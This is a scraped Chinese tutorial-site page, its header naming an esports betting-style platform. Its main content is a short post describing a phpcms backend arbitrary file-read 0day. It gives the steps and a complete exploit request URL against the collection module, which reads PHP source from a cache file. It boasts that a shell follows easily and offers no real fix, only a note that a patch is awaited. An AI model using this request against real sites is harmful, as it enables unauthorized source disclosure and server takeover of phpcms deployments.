雷火电竞-中国电竞赛事及体育赛事平台

歡迎來到入門教程網(wǎng)!

phpcms

當(dāng)前位置:主頁 > CMS教程 > phpcms >

phpcms后臺(tái)普通用戶讀文件0day的分析以及修復(fù)方法

來源:本站原創(chuàng)|時(shí)間:2020-01-10|欄目:phpcms|點(diǎn)擊:

后臺(tái)采集里設(shè)置采集模塊中title 或者其他的內(nèi)容都可以 設(shè)置為<?php[內(nèi)容]?>
然后用下面的代碼就可以讀取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不難了。具體如何利用看大家自己了。(別跟我說只會(huì)讀數(shù)據(jù)庫連接文件,并且還不能連),反正我是可以拿到shell。
修復(fù):已提交給官方,等待補(bǔ)丁

上一篇:phpcms V9 常用文件目錄結(jié)構(gòu)

欄    目:phpcms

下一篇:Phpcms V9 調(diào)用全站文章排行的解決方法

本文標(biāo)題:phpcms后臺(tái)普通用戶讀文件0day的分析以及修復(fù)方法

本文地址:http://www.jygsgssxh.com/a1/phpcms/9901.html

網(wǎng)頁制作CMS教程網(wǎng)絡(luò)編程軟件編程腳本語言數(shù)據(jù)庫服務(wù)器

如果侵犯了您的權(quán)利,請(qǐng)與我們聯(lián)系,我們將在24小時(shí)內(nèi)進(jìn)行處理、任何非本站因素導(dǎo)致的法律后果,本站均不負(fù)任何責(zé)任。

聯(lián)系QQ:835971066 | 郵箱:835971066#qq.com(#換成@)

Copyright © 2002-2020 腳本教程網(wǎng) 版權(quán)所有